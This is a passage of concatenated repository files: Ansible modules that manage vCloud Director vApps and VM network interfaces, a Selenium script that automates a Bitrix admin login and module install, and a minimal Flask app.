fence_mode=fence_mode,
ip_allocation_mode=ip_allocation_mode,
deploy=deploy,
power_on=power_on,
accept_all_eulas=accept_all_eulas,
memory=memory,
cpu=cpu,
disk_size=disk_size,
                password=vmpassword,
cust_script=cust_script,
vm_name=vm_name,
hostname=hostname,
ip_address=ip_address,
storage_profile=storage_profile,
network_adapter_type=network_adapter_type)
self.execute_task(create_vapp_task.Tasks.Task[0])
msg = 'Vapp {} has been created'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
else:
msg = "Vapp {} is already present"
response['warnings'] = msg.format(vapp_name)
return response
def create(self):
params = self.params
catalog_name = params.get('catalog_name')
# vapp initialization if catalog has been provided
if catalog_name:
return self.instantiate()
vapp_name = params.get('vapp_name')
description = params.get('description')
network = params.get('network')
fence_mode = params.get('fence_mode')
accept_all_eulas = params.get('accept_all_eulas')
response = dict()
response['changed'] = False
try:
self.vdc.get_vapp(vapp_name)
except EntityNotFoundException:
create_vapp_task = self.vdc.create_vapp(
name=vapp_name,
description=description,
network=network,
fence_mode=fence_mode,
accept_all_eulas=accept_all_eulas)
self.execute_task(create_vapp_task.Tasks.Task[0])
msg = 'Vapp {} has been created'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
else:
msg = "Vapp {} is already present"
response['warnings'] = msg.format(vapp_name)
return response
def delete(self):
vapp_name = self.params.get('vapp_name')
force = self.params.get('force')
response = dict()
response['changed'] = False
try:
self.vdc.get_vapp(vapp_name)
except EntityNotFoundException:
response['warnings'] = "Vapp {} is not present.".format(vapp_name)
else:
delete_vapp_task = self.vdc.delete_vapp(
name=vapp_name, force=force)
self.execute_task(delete_vapp_task)
response['msg'] = 'Vapp {} has been deleted.'.format(vapp_name)
response['changed'] = True
return response
def power_on(self):
vapp_name = self.params.get('vapp_name')
response = dict()
response['changed'] = False
vapp = self.get_vapp()
if vapp.is_powered_on():
msg = 'Vapp {} is already powered on'
response['warnings'] = msg.format(vapp_name)
return response
try:
power_on_vapp_task = vapp.power_on()
self.execute_task(power_on_vapp_task)
msg = 'Vapp {} has been powered on'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
except OperationNotSupportedException:
msg = 'Operation is not supported. You may have no VM(s) in {}'
response['warnings'] = msg.format(vapp_name)
return response
def power_off(self):
vapp_name = self.params.get('vapp_name')
response = dict()
response['changed'] = False
vapp = self.get_vapp()
if vapp.is_powered_off():
msg = 'Vapp {} is already powered off'
response['warnings'] = msg.format(vapp_name)
return response
try:
power_off_vapp_task = vapp.power_off()
self.execute_task(power_off_vapp_task)
msg = 'Vapp {} has been powered off'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
except OperationNotSupportedException:
msg = 'Operation is not supported. You may have no VM(s) in {}'
response['warnings'] = msg.format(vapp_name)
return response
def deploy(self):
vapp_name = self.params.get('vapp_name')
response = dict()
response['changed'] = False
vapp = self.get_vapp()
if vapp.is_deployed():
msg = 'Vapp {} is already deployed'
response['warnings'] = msg.format(vapp_name)
return response
deploy_vapp_task = vapp.deploy()
self.execute_task(deploy_vapp_task)
msg = 'Vapp {} has been deployed'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
return response
def undeploy(self):
vapp_name = self.params.get('vapp_name')
response = dict()
response['changed'] = False
vapp = self.get_vapp()
if not vapp.is_deployed():
msg = 'Vapp {} is already undeployed'
response['warnings'] = msg.format(vapp_name)
return response
undeploy_vapp_task = vapp.undeploy(action="powerOff")
self.execute_task(undeploy_vapp_task)
response['msg'] = 'Vapp {} has been undeployed.'.format(vapp_name)
response['changed'] = True
return response
def list_vms(self):
vapp = self.get_vapp()
response = dict()
response['msg'] = list()
for vm in vapp.get_all_vms():
try:
ip = vapp.get_primary_ip(vm.get('name'))
except Exception:
ip = None
finally:
vm_details = {"name": vm.get('name'),
"status": VM_STATUSES[vm.get('status')],
"deployed": vm.get('deployed') == 'true',
"ip_address": ip
}
response['msg'].append(vm_details)
return response
def list_networks(self):
vapp = self.get_vapp()
response = dict()
networks = vapp.get_all_networks()
response['msg'] = [network.get(
'{' + NSMAP['ovf'] + '}name') for network in networks]
return response
def main():
argument_spec = vapp_merge_argument_spec()
response = dict(
msg=dict(type='str')
)
module = Vapp(argument_spec=argument_spec, supports_check_mode=True)
try:
if not module.params.get('state'):
raise Exception('Please provide the state for the resource.')
response = module.manage_states()
module.exit_json(**response)
except Exception as error:
response['msg'] = str(error)
module.fail_json(**response)
if __name__ == '__main__':
main()
```
#### File: ansible/modules/vcd_vapp_vm_interface.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vcd_vapp_vm_nic
short_description: Ansible Module to manage (add/delete/update) NICs in vApp VMs in vCloud Director.
version_added: "2.4"
description:
- "Ansible Module to manage (add/delete/update) NICs in vApp VMs."
options:
user:
description:
- vCloud Director user name
required: false
password:
description:
- vCloud Director user password
required: false
host:
description:
- vCloud Director host address
required: false
org:
description:
- Organization name on vCloud Director to access
required: false
api_version:
description:
- Pyvcloud API version
required: false
verify_ssl_certs:
description:
- whether to use secure connection to vCloud Director host
required: false
nic_id:
description:
- NIC ID (required for operation update, optional for state present)
required: false
nic_ids:
description:
- List of NIC IDs (required for state absent)
required: false
adapter_type:
description:
- Adapter type (VMXNET3, E1000E, ...)
required: false
network:
description:
- vApp network name
required: false
vm_name:
description:
- VM name
required: true
vapp:
description:
- vApp name
required: true
vdc:
description:
- VDC name
required: true
ip_allocation_mode:
description:
- IP allocation mode (DHCP, POOL or MANUAL)
required: false
ip_address:
description:
- NIC IP address (required for MANUAL IP allocation mode)
required: false
state:
description:
- state of nic (present/absent).
- One from state or operation has to be provided.
required: true
operation:
description:
- operation on nic (update/read).
- One from state or operation has to be provided.
required: false
author:
- <EMAIL>
'''
EXAMPLES = '''
- name: Test with a message
vcd_vapp_vm_nic:
user: terraform
password: <PASSWORD>
host: csa.sandbox.org
org: Terraform
api_version: 30
verify_ssl_certs: False
vm: "vm1"
vapp = "vapp1"
vdc = "vdc1"
nic_id = "2"
ip_allocation_mode = "MANUAL"
ip_address = "172.16.0.11"
state = "present"
'''
RETURN = '''
msg: success/failure message corresponding to nic state
changed: true if resource has been changed else false
'''
import os
import unittest
import yaml
from copy import deepcopy
from lxml import etree
from collections import defaultdict
from pyvcloud.vcd.vm import VM
from pyvcloud.vcd.org import Org
from pyvcloud.vcd.vdc import VDC
from pyvcloud.vcd.client import E
from pyvcloud.vcd.client import Client
from pyvcloud.vcd.client import ApiVersion
from pyvcloud.vcd.vapp import VApp
from pyvcloud.vcd.client import E_RASD
from pyvcloud.vcd.client import NSMAP
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.client import find_link
from pyvcloud.vcd.client import IpAddressMode
from pyvcloud.vcd.client import MetadataDomain
from pyvcloud.vcd.client import MetadataValueType
from pyvcloud.vcd.client import MetadataVisibility
from pyvcloud.vcd.client import QueryResultFormat
from pyvcloud.vcd.client import RelationType
from pyvcloud.vcd.client import ResourceType
from pyvcloud.vcd.client import VCLOUD_STATUS_MAP
from pyvcloud.vcd.client import VmNicProperties
from pyvcloud.vcd.exceptions import EntityNotFoundException
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.exceptions import InvalidStateException
from pyvcloud.vcd.exceptions import MultipleRecordsException
from pyvcloud.vcd.exceptions import OperationNotSupportedException
from pyvcloud.vcd.metadata import Metadata
from pyvcloud.vcd.utils import retrieve_compute_policy_id_from_href
#from pyvcloud.vcd.utils import update_vm_compute_policy_element
from pyvcloud.vcd.utils import uri_to_api_uri
from ansible.module_utils.vcd import VcdAnsibleModule
VAPP_VM_NIC_STATES = ['present', 'absent', 'update']
VAPP_VM_NIC_OPERATIONS = ['read', 'validate']
def vapp_vm_nic_argument_spec():
return dict(
vm_name=dict(type='str', required=True),
vapp=dict(type='str', required=True),
vdc=dict(type='str', required=True),
nic_id=dict(type='int', required=False),
nic_ids=dict(type='list', required=False),
is_connected=dict(type='bool', required=False, default=False),
ip_allocation_mode=dict(type='str', required=False),
ip_address=dict(type='str', required=False),
network=dict(type='str', required=False),
adapter_type=dict(type='str', required=False),
is_primary=dict(type='bool', required=False, default=False),
state=dict(choices=VAPP_VM_NIC_STATES, required=False),
operation=dict(choices=VAPP_VM_NIC_OPERATIONS, required=False),
)
class VappVMNIC(VcdAnsibleModule):
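# Ansible module for managing NICs of a VM inside a vApp: add/update/delete
# NICs via 'state', read/validate via 'operation'.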
def __init__(self, **kwargs):
super(VappVMNIC, self).__init__(**kwargs)
vapp_resource = self.get_resource()
vapp = VApp(self.client, resource=vapp_resource)
self.vapp = vapp
def manage_states(self):
state = self.params.get('state')
if state == "present":
return self.add_nic_ng()
if state == "update":
return self.update_nic()
if state == "absent":
return self.delete_nic()
if state == "validate":
return self.validate_nic()
def manage_operations(self):
operation = self.params.get('operation')
if operation == "read":
return self.read_nics()
if operation == "validate":
return self.validate_nic()
def create_list_with_present_nics(self):
response = defaultdict(dict)
response['changed'] = False
response['msg'] = []
present_nics_list = []
vm = self.get_vm()
nics = self.client.get_resource(
vm.resource.get('href') + '/networkConnectionSection')
for nic in nics.NetworkConnection:
present_nics_list.append(nic.NetworkConnectionIndex.text)
response['msg'].append({
'index': nic.NetworkConnectionIndex.text,
'network': nic.get('network')
})
self.present_nics_list = present_nics_list
return self.present_nics_list
def get_vm_nic_section(self):
vm = self.get_vm()
return self.client.get_resource(
vm.resource.get('href') + '/networkConnectionSection')
def get_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return vapp_resource
def get_vm_nics_ng(self):
vm = self.get_vm_ng()
return self.client.get_resource(
vm.resource.get('href') + '/networkConnectionSection')
def return_nics_indexes(self):
nics_returned_indexes = self.get_vm_nics_ng()
nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics_returned_indexes.NetworkConnection]
nics_indexes.sort()
self.nics_indexes = nics_indexes
return self.nics_indexes
def get_vm_ng(self):
vapp_vm_resource = self.vapp.get_vm(self.params.get('vm_name'))
return VM(self.client, resource=vapp_vm_resource)
def get_vapp_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=vapp, entity_type=EntityType.VAPP)
return self.client.get_resource(vapp_resource_href)
def get_vm_resource(self):
return self.get_vm().resource
def get_vm(self):
vapp_vm_resource = self.vapp.get_vm(self.params.get('vm_name'))
self.local_vm = VM(self.client, resource=vapp_vm_resource)
return self.local_vm
def get_vm_nics(self):
vm = self.get_vm()
return self.client.get_resource(vm.resource.get('href') + '/networkConnectionSection')
def add_nic_ng(self):
# gather the NIC parameters and the VM's network connection section
nic_id = self.params.get('nic_id')
is_primary = self.params.get('is_primary')
network_name = self.params.get('network')
is_connected = self.params.get('is_connected')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
adapter_type = self.params.get('adapter_type')
net_conn_section = self.get_vm_nic_section()
nic_index = nic_id
insert_index = net_conn_section.index(
net_conn_section['{' + NSMAP['ovf'] + '}Info']) + 1
# check if any nics exist
if hasattr(net_conn_section, 'PrimaryNetworkConnectionIndex'):
# calculate the first free nic index and insert after the primary index element
indices = [None] * 10
insert_index = net_conn_section.index(
net_conn_section.PrimaryNetworkConnectionIndex) + 1
for nc in net_conn_section.NetworkConnection:
indices[int(nc.NetworkConnectionIndex.text)] = nc.NetworkConnectionIndex.text
nic_index = indices.index(None)
if is_primary:
net_conn_section.PrimaryNetworkConnectionIndex = E.PrimaryNetworkConnectionIndex(nic_index)
net_conn = E.NetworkConnection(network=network_name)
net_conn.set('needsCustomization', 'true')
net_conn.append(E.NetworkConnectionIndex(nic_index))
if ip_allocation_mode == IpAddressMode.MANUAL.value:
net_conn.append(E.IpAddress(ip_address))
else:
net_conn.append(E.IpAddress())
net_conn.append(E.IsConnected(is_connected))
net_conn.append(E.IpAddressAllocationMode(ip_allocation_mode))
net_conn.append(E.NetworkAdapterType(adapter_type))
net_conn_section.insert(insert_index, net_conn)
self.net_conn = net_conn
vm_resource = self.get_vm().resource
vm_resource.NetworkConnectionSection = net_conn_section
return self.client.post_linked_resource(
vm_resource, RelationType.RECONFIGURE_VM, EntityType.VM.value,
vm_resource)
def net_connection_obj_create(self, network_name, nic_index, ip_address_mode,
ip_address, is_connected, adapter_type):
net_conn = E.NetworkConnection(network=network_name)
net_conn.set('needsCustomization', 'true')
net_conn.append(E.NetworkConnectionIndex(nic_index))
if ip_address_mode == IpAddressMode.MANUAL.value:
net_conn.append(E.IpAddress(ip_address))
else:
net_conn.append(E.IpAddress())
net_conn.append(E.IsConnected(is_connected))
net_conn.append(E.IpAddressAllocationMode(ip_address_mode))
net_conn.append(E.NetworkAdapterType(adapter_type))
return net_conn
def net_connection_section_obj_create(self):
# build (but do not post) an updated network connection section; returns the
# section together with the computed free nic index and insert position
is_primary = self.params.get('is_primary')
net_conn_section = self.get_vm_nic_section()
nic_index = 0
insert_index = net_conn_section.index(
net_conn_section['{' + NSMAP['ovf'] + '}Info']) + 1
# check if any nics exist
if hasattr(net_conn_section, 'PrimaryNetworkConnectionIndex'):
# calculate nic index and move the insert position past the primary index element
indices = [None] * 10
insert_index = net_conn_section.index(
net_conn_section.PrimaryNetworkConnectionIndex) + 1
for nc in net_conn_section.NetworkConnection:
indices[int(nc.NetworkConnectionIndex.text)] = nc.NetworkConnectionIndex.text
nic_index = indices.index(None)
if is_primary:
net_conn_section.PrimaryNetworkConnectionIndex = \
E.PrimaryNetworkConnectionIndex(nic_index)
return net_conn_section, nic_index, insert_index
def add_nic(self):
vm = self.get_vm()
vm_name = self.params.get('vm_name')
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
is_connected = self.params.get('is_connected')
ip_allocation_mode = self.params.get('ip_allocation_mode')
adapter_type = self.params.get('adapter_type')
response = defaultdict(dict)
response['changed'] = False
new_nic_id = None
nics = self.get_vm_nics()
nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
nics_indexes.sort()
for nic in nics.NetworkConnection:
if nic.NetworkConnectionIndex == nic_id:
response['warnings'] = 'NIC {} is already present on VM {}'.format(
nic_id, vm_name)
return response
if not adapter_type:
nics_adapters = [str(nic.NetworkAdapterType) for nic in nics.NetworkConnection]
adapter_type = nics_adapters[0]  # select the first nic NetworkAdapterType
if nic_id is None or nic_id < 0:
# pick the first free index: the first gap in the sorted list, else max + 1
for index, nic_index in enumerate(nics_indexes):
new_nic_id = nic_index + 1
if index != nic_index:
new_nic_id = index
break
nic_id = new_nic_id
if ip_allocation_mode not in ('DHCP', 'POOL', 'MANUAL'):
raise Exception('IpAllocationMode should be one of DHCP/POOL/MANUAL')
add_nic_task = vm.add_nic(adapter_type=adapter_type,
is_primary=self.params.get('is_primary'),
is_connected=is_connected,
network_name=network,
ip_address_mode=ip_allocation_mode,
ip_address=ip_address)
self.execute_task(add_nic_task)
response['msg'] = {
'nic_id': nic_id,
'adapter_type': adapter_type,
'ip_allocation_mode': ip_allocation_mode,
'ip_address': ip_address,
'network': network,
'is_connected': is_connected
}
response['changed'] = True
return response
def validate_add_nic(self):
'''
Error - More than 10 Nics are not permissible in vCD
'''
vm = self.get_vm()
vm_name = self.params.get('vm_name')
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
adapter_type = self.params.get('adapter_type')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
new_nic_id = None
nics = self.get_vm_nics()
nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
nics_indexes.sort()
for nic in nics.NetworkConnection:
if nic.NetworkConnectionIndex == nic_id:
response['warnings'] = 'Validate add: NIC {} is already present on VM {}'.format(
nic_id, vm_name)
return response
if not adapter_type:
nics_adapters = [str(nic.NetworkAdapterType) for nic in nics.NetworkConnection]
adapter_type = nics_adapters[0] # select the first nic NetworkAdapterType
if nic_id is None or nic_id < 0:
for index, nic_index in enumerate(nics_indexes):
new_nic_id = nic_index + 1
if index != nic_index:
new_nic_id = index
break
nic_id = new_nic_id
if ip_allocation_mode not in ('DHCP', 'POOL', 'MANUAL'):
raise Exception('IpAllocationMode should be one of DHCP/POOL/MANUAL')
if ip_allocation_mode in ('DHCP', 'POOL'):
nic = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
E.NetworkAdapterType(adapter_type),
network=network)
else:
if not ip_address:
raise Exception('IpAddress is missing.')
nic = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
E.NetworkAdapterType(adapter_type),
network=network)
nics.NetworkConnection.addnext(nic)
add_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(add_nic_task)
response['msg'] = {
'nic_id': nic_id,
'adapter_type': adapter_type,
'ip_allocation_mode': ip_allocation_mode,
'ip_address': ip_address,
'network': network,
'Validate add: ': 'true'
}
response['changed'] = True
return response
def update_nic(self):
'''
Following update scenarios are covered
1. IP allocation mode change: DHCP, POOL, MANUAL
2. Update IP address in MANUAL mode
3. Network change
'''
vm = self.get_vm()
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
nics = self.get_vm_nics()
nic_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
if nic_id not in nic_indexes:
response['warnings'] = 'NIC not found.'
return response
nic_to_update = nic_indexes.index(nic_id)
if network:
nics.NetworkConnection[nic_to_update].set('network', network)
response['changed'] = True
if ip_allocation_mode:
allocation_mode_element = E.IpAddressAllocationMode(ip_allocation_mode)
nics.NetworkConnection[nic_to_update].IpAddressAllocationMode = allocation_mode_element
response['changed'] = True
if ip_address:
response['changed'] = True
if hasattr(nics.NetworkConnection[nic_to_update], 'IpAddress'):
nics.NetworkConnection[nic_to_update].IpAddress = E.IpAddress(ip_address)
else:
network = nics.NetworkConnection[nic_to_update].get('network')
nics.NetworkConnection[nic_to_update] = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
if response['changed']:
update_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(update_nic_task)
response['msg'] = 'vApp VM nic has been updated.'
return response
def validate_nic(self):
'''
Following update scenarios are covered
1. IP allocation mode change: DHCP, POOL, MANUAL
2. Update IP address in MANUAL mode
3. Network change
A NIC that does not exist yet is added instead of updated.
'''
vm = self.get_vm()
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
adapter_type = self.params.get('adapter_type')
is_connected = self.params.get('is_connected')
ip_allocation_mode = self.params.get('ip_allocation_mode')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
nics = self.get_vm_nics()
if not hasattr(nics, 'NetworkConnection'):
# no adapters are present in the VM yet, so add the first one
add_nic_task = vm.add_nic(adapter_type=adapter_type,
is_primary=self.params.get('is_primary'),
is_connected=is_connected,
network_name=network,
ip_address_mode=ip_allocation_mode,
ip_address=ip_address)
self.execute_task(add_nic_task)
response['msg'] = {
'nic_id': nic_id,
'adapter_type': adapter_type,
'ip_allocation_mode': ip_allocation_mode,
'ip_address': ip_address,
'network': network,
'is_connected': is_connected
}
response['changed'] = True
return response
nic_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
if nic_id not in nic_indexes:
# NIC not found, add it instead of updating it
return self.validate_add_nic()
nic_to_update = nic_indexes.index(nic_id)
if network:
nics.NetworkConnection[nic_to_update].set('network', network)
response['changed'] = True
if ip_allocation_mode:
allocation_mode_element = E.IpAddressAllocationMode(ip_allocation_mode)
nics.NetworkConnection[nic_to_update].IpAddressAllocationMode = allocation_mode_element
response['changed'] = True
if ip_address:
response['changed'] = True
if hasattr(nics.NetworkConnection[nic_to_update], 'IpAddress'):
nics.NetworkConnection[nic_to_update].IpAddress = E.IpAddress(ip_address)
else:
network = nics.NetworkConnection[nic_to_update].get('network')
nics.NetworkConnection[nic_to_update] = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
if response['changed']:
update_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(update_nic_task)
response['msg'] = 'vApp VM nic has been updated.'
return response
def read_nics(self):
response = defaultdict(dict)
response['changed'] = False
nics = self.get_vm_nics()
for nic in nics.NetworkConnection:
meta = defaultdict(dict)
nic_id = str(nic.NetworkConnectionIndex)
meta['Network'] = str(nic.get('network'))
meta['MACAddress'] = str(nic.MACAddress)
meta['IsConnected'] = str(nic.IsConnected)
meta['NetworkAdapterType'] = str(nic.NetworkAdapterType)
meta['NetworkConnectionIndex'] = str(nic.NetworkConnectionIndex)
meta['IpAddressAllocationMode'] = str(nic.IpAddressAllocationMode)
if hasattr(nic, 'IpAddress'):
meta['IpAddress'] = str(nic.IpAddress)
response['msg'][nic_id] = meta
return response
def delete_nic(self):
vm = self.get_vm()
nic_ids = self.params.get('nic_ids')
response = defaultdict(dict)
response['changed'] = False
uri = vm.resource.get('href') + '/networkConnectionSection'
nics = self.get_vm_nics()
for nic in list(nics.NetworkConnection):
if int(nic.NetworkConnectionIndex) in nic_ids:
nics.remove(nic)
nic_ids.remove(int(nic.NetworkConnectionIndex))
if len(nic_ids) > 0:
nic_ids = [str(nic_id) for nic_id in nic_ids]
err_msg = 'Can\'t find the specified VM nic(s) {0}'.format(','.join(nic_ids))
raise EntityNotFoundException(err_msg)
remove_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(remove_nic_task)
response['msg'] = 'VM nic(s) have been deleted.'
response['changed'] = True
return response
def main():
argument_spec = vapp_vm_nic_argument_spec()
response = dict(
msg=dict(type='str')
)
module = VappVMNIC(argument_spec=argument_spec, supports_check_mode=True)
try:
if module.params.get('state'):
response = module.manage_states()
elif module.params.get('operation'):
response = module.manage_operations()
else:
raise Exception('One of the state/operation should be provided.')
except Exception as error:
response['msg'] = str(error)
module.fail_json(**response)
module.exit_json(**response)
if __name__ == '__main__':
main()
```
#### File: docker-selenium/templates/4_marketplace.py
```python
import logging
import time
import os
import sys
import collections
import selenium.webdriver
import selenium.webdriver.support.ui as ui
import logging.handlers as handlers
from logging.handlers import RotatingFileHandler
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import TimeoutException as SeleniumTimeoutException
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.webdriver.support.wait import WebDriverWait
from elements import *
from helpers import *
TIMEOUT = 10
SLOWPOKE_TIMEOUT = 100
def configure_logger():
scriptlogger = logging.getLogger('')
scriptlogger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
to_stdout = logging.StreamHandler(sys.stdout)
to_stdout.setFormatter(formatter)
scriptlogger.addHandler(to_stdout)
to_file = handlers.RotatingFileHandler(filename='/tmp/selenium-marketplace-install.log', maxBytes=(1048576*5), backupCount=7)
to_file.setFormatter(formatter)
scriptlogger.addHandler(to_file)
def wait_element_by_xpath(driver, element):
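# Waits up to 10 seconds for the element to appear; a miss is logged and ignored.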
logging.info('driver: {0} element: {1}'.format(driver, element))
try:
wait = WebDriverWait(driver, 10)
my_current_element = wait.until(EC.presence_of_element_located((By.XPATH, element)))
logging.info('my_current_element: {0}'.format(my_current_element))
except Exception:
time.sleep(2)
logging.info('Not found element: {0}'.format(element))
logging.info('element: {0}'.format(element))
# MAIN SETTINGS
def click_xpath_module_contain_main(driver, modulename):
logging.info('driver: {0} modulename: {1}'.format(driver, modulename))
request_path_main_element = (".//*[contains(@id, '{0}')]").format(modulename)
logging.info('request_path_main_element: {0}'.format(request_path_main_element))
request_path_second_element = ("//*[substring-after(name(), 'TEMPLATE') = '']")
next_button = '//option[@value="main"]'
logging.info('request_path_second_element: {0}'.format(request_path_second_element))
request_to_xpath = '{0}{1}{2}'.format(request_path_main_element, request_path_second_element, next_button)
logging.info('request_to_xpath: {0}'.format(request_to_xpath))
wait_element_by_xpath(driver, request_to_xpath)
found_element = driver.find_element(By.XPATH, request_to_xpath)
logging.info('Found element to click: {0}'.format(found_element))
found_element.click()
# the next button resolves to the same xpath here, so click it as well
driver.find_element(By.XPATH, request_to_xpath).click()
def login_to_admin():
logging.info('Logger Ok')
global bitrix_ip
#bitrix_ip = "production.toprussianbloggers.ru"
bitrix_ip = "{{ bitrixip.stdout }}"
#bitrix_url = "http://" + bitrix_ip
global bitrix_url
bitrix_url = "http://" + bitrix_ip
global bitrix_url_admin
bitrix_url_admin = bitrix_url + "/bitrix/admin/module_admin.php?lang=en"
b = selenium.webdriver.Chrome()
wait = WebDriverWait(b, TIMEOUT)
wait2 = WebDriverWait(b, SLOWPOKE_TIMEOUT)
actor = Actions(wait)
actor2 = Actions(wait2)
logging.info('Prepare Get URL')
#b.get('http://{{ bitrixip.stdout }}/bitrix/admin/module_admin.php?lang=en')
b.get(bitrix_url_admin)
logging.info('Get Ok')
global template_url
global site_edit_url
template_url_ip = "http://" + bitrix_ip
template_url = template_url_ip + "/bitrix/admin/template_edit.php?lang=en&ID=main"
site_edit_url = template_url_ip + "/bitrix/admin/partner_modules.php?lang=en"
logging.info('template_url: {0}'.format(template_url))
password_status = actor.wait_visible_pass(USER_PASSWORD)
logging.info('Password status {0}'.format(password_status))
actor.wait_clickable(USER_LOGIN).send_keys('<PASSWORD>')
actor.wait_visible(USER_PASSWORD).click()
#actor.wait_clickable(USER_PASSWORD).send_keys('<PASSWORD>819hr1br12br18qQ')
actor.wait_clickable(USER_PASSWORD).send_keys('{{ mysql_root_password }}')
actor.wait_clickable(KEEP_AUTH_TO_ADMIN).click()
actor.wait_clickable(LOGIN).click()
logging.info('Login Ok')
close_helper_check_and_close(b, actor)
driver = b
return driver
def close_helper_check_and_close(close_driver, actor):
logging.info('close_helper_check_and_close start')
logging.info('close_driver: {0}'.format(close_driver))
logging.info('actor: {0}'.format(actor))
close_sing_up_windows_status = actor.wait_visible_pass(SINGLE_LOGON_CLOSE_HELPER)
logging.info('............................................................................')
logging.info('close_sing_up_windows_status status {0}'.format(close_sing_up_windows_status))
logging.info('............................................................................')
if close_sing_up_windows_status is None:
logging.info('............................................................................')
logging.info('Button not finded, value is none')
logging.info('............................................................................')
else:
logging.info('............................................................................')
logging.info('Button finded:')
logging.info('close_sing_up_windows_status: {0}'.format(close_sing_up_windows_status))
logging.info('............................................................................')
close_button_by_id_object = actor.wait_visible_pass(CLOSE_BUTTON_BY_ID)
close_button_by_id_object.click()
dont_show_checkbox = actor.wait_visible_pass(DONTSHOW_CHECKBOX)
if dont_show_checkbox is None:
logging.info('dont_show_checkbox not finded, value is none')
else:
logging.info('dont_show_checkbox finded, go click')
dont_show_checkbox.click()
close_button_by_id_object_dontshow = actor.wait_visible_pass(CLOSE_BUTTON_BY_ID)
close_button_by_id_object_dontshow.click()
logging.info('close_helper_check_and_close done')
def main():
configure_logger()
logging.info('Started')
driver = login_to_admin()
# PRINT RESULTS
logging.info('BITRIX URL: {0}'.format(bitrix_url))
logging.info('BITRIX IP: {0}'.format(bitrix_ip))
logging.info('BITRIX URL ADMIN: {0}'.format(bitrix_url_admin))
wait = WebDriverWait(driver, TIMEOUT)
wait2 = WebDriverWait(driver, SLOWPOKE_TIMEOUT)
actor = Actions(wait)
actor2 = Actions(wait2)
driver.get(site_edit_url)
close_helper_check_and_close(driver, actor)
frame = driver.find_element_by_class_name('adm-list-table')
logging.info('frame: {0}'.format(frame))
links = frame.find_elements_by_xpath('.//*')
for link in links:
logging.info('...........................................')
indi_variable = "Woinc 15.4.2"
exclude_marker = "bitrix.sitecommunity"
_self_link_text = link.text
if indi_variable in _self_link_text and exclude_marker not in _self_link_text:
logging.info('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
logging.info('link: {0}'.format(link))
logging.info('Big win: {0} link_text: {1}'.format(driver, link.text))
logging.info('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
actionChains = ActionChains(driver)
actionChains.context_click(link).perform()
install_click = actor.wait_visible(INDIVID_INSTALL_OBJECT)
install_click.click()
return True
logging.info('Finished')
return True
if __name__ == "__main__":
# execute only if run as a script
main()
```
#### File: nginx/flask_site/app.py
```python
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
tv_show = "The Office"
return render_template("index.html", show=tv_show)
if __name__ == "__main__":
app.run()
``` |
{
"source": "0zym4ndias/PingPong",
"score": 4
} |
